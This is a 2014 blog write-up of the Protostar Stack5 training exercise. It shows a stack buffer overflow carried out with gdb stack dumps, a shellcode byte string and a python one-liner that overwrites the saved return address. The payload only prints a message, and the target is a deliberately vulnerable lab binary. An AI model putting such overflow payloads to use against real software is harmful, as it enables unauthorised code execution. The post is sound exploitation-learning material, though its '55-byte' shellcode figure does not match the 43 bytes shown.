Saturday, December 20, 2014

Protostar - Stack #5


About:

Stack5 is a standard buffer overflow, this time introducing shellcode. (link)


Source Code:





Solution:

This time, because it's just an introduction to shellcode, we need to supply our own objective & shellcode.

I'll use the 55-byte shellcode example from this blog post: http://www.orkspace.net/software/libShellCode/examples/example_1.c
\xeb\x19\x5e\x31\xc0\x31\xdb\x31\xd2\x89\xf1\x80\xc3\x01\xb0\x04\xb2\x0b\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80\xe8\xe2\xff\xff\xff\x49\x27\x6d\x20\x48\x65\x72\x65\x21\x21\x21
This code will print out the text "I'm Here!!!" and exit.

To have this code get executed, we can fill the buffer with our shellcode, fill up the rest of the buffer with garbage values, and then overwrite the saved return address to point to the start of the buffer.


 (gdb) break main
Breakpoint 1 at 0x80483cd: file stack5/stack5.c, line 10.

(gdb) break *0x080483d9 (right after the gets call)
Breakpoint 2 at 0x80483d9: file stack5/stack5.c, line 11.

(gdb) run < /tmp/a (a file filled with "a"s)
Starting program: /opt/protostar/bin/stack5 < /tmp/a
Breakpoint 1, main (argc=1, argv=0xbffff874) at stack5/stack5.c:10
10    stack5/stack5.c: No such file or directory.
    in stack5/stack5.c

(gdb) x/20xg $esp
0xbffff770:    0xb7ec6165b7fd7ff4    0xb7eada75bffff788
0xbffff780:    0x0804958cb7fd7ff4    0x080482c4bffff798
0xbffff790:    0x0804958cb7ff1040    0x08048409bffff7c8
0xbffff7a0:    0xb7fd7ff4b7fd8304    0xbffff7c8080483f0
0xbffff7b0:    0xb7ff1040b7ec6365    0xb7fd7ff4080483fb
0xbffff7c0:    0x00000000080483f0    0xb7eadc76bffff848
0xbffff7d0:    0xbffff87400000001    0xb7fe1848bffff87c
0xbffff7e0:    0xffffffffbffff830    0x08048232b7ffeff4
0xbffff7f0:    0xbffff83000000001    0xb7fffab0b7ff0626
0xbffff800:    0xb7fd7ff4b7fe1b28    0x0000000000000000

(gdb) c
Continuing.
Breakpoint 2, main (argc=1, argv=0xbffff874) at stack5/stack5.c:11
11    in stack5/stack5.c

(gdb) x/20xg $esp
0xbffff770:    0xb7ec6165bffff780    0xb7eada75bffff788
0xbffff780:    0x6161616161616161    0x6161616161616161
0xbffff790:    0x6161616161616161    0x6161616161616161
0xbffff7a0:    0xb7fd7ff4b7fd8300    0xbffff7c8080483f0
0xbffff7b0:    0xb7ff1040b7ec6365    0xb7fd7ff4080483fb
0xbffff7c0:    0x00000000080483f0    0xb7eadc76bffff848
0xbffff7d0:    0xbffff87400000001    0xb7fe1848bffff87c
0xbffff7e0:    0xffffffffbffff830    0x08048232b7ffeff4
0xbffff7f0:    0xbffff83000000001    0xb7fffab0b7ff0626
0xbffff800:    0xb7fd7ff4b7fe1b28    0x0000000000000000


Ok this looks good. We know our buffer is starting at 0xbffff780.

We know from before, we need 76 bytes between the start of the buffer and the value we want to overwrite the saved EIP with.

Using the shellcode from above, we need 33 more padding bytes in order to get our return address correct:

python -c "print '\xeb\x19\x5e\x31\xc0\x31\xdb\x31\xd2\x89\xf1\x80\xc3\x01\xb0\x04\xb2\x0b\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80\xe8\xe2\xff\xff\xff\x49\x27\x6d\x20\x48\x65\x72\x65\x21\x21\x21' + 'a'*33 + '\xbf\xff\xf7\x70'[::-1]" > /tmp/sc

Once we have our buffer saved in /tmp/sc, we can run stack5 and send the contents of /tmp/sc through stdin.

user@protostar:/opt/protostar/bin$ cat /tmp/sc | /opt/protostar/bin/stack5
I'm Here!!!

That's it!

One thing that I haven't fully figured out is what changes when you call stack5 via a relative path instead of an absolute path.

For example, running the line above works, but running cat /tmp/sc | ./stack5 will give a segfault. This lost me about a half-hour and I'll try to come back to this later if I figure it out.



Posted by at
Labels: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)